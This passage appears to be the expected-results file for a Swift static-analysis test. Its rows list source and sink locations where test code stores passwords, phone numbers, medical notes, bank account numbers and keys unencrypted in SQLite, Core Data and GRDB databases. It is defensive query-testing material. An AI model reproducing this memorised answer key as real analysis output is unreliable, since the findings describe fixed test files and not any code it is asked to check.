SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:149:31:149:31 | [...] | SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:171:31:171:69 | [...] | SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | +| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | +| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:88:2:88:10 | ...? | testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:89:2:89:10 | ...? | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | +| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | +| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | +| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | +| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | +| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | +| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | +| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | +| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | +| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | +| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | +| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | +| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | +| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | +| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | +| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | +| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | +| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | +| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | +| testGRDB.swift:95:36:95:45 | [...] | testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | +| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | +| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | +| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | +| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | +| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | +| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | +| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | +| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | +| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | +| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | +| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | +| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | +| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | +| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | +| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | +| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | +| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | +| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | +| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | +| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | +| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:155:66:155:66 | password | password | +| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | +| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | +| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | +| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | +| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | +| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | +| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:173:57:173:57 | password | password | +| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | +| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | +| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | +| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | +| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | +| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | +| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:188:48:188:48 | password | password | +| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | +| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | +| 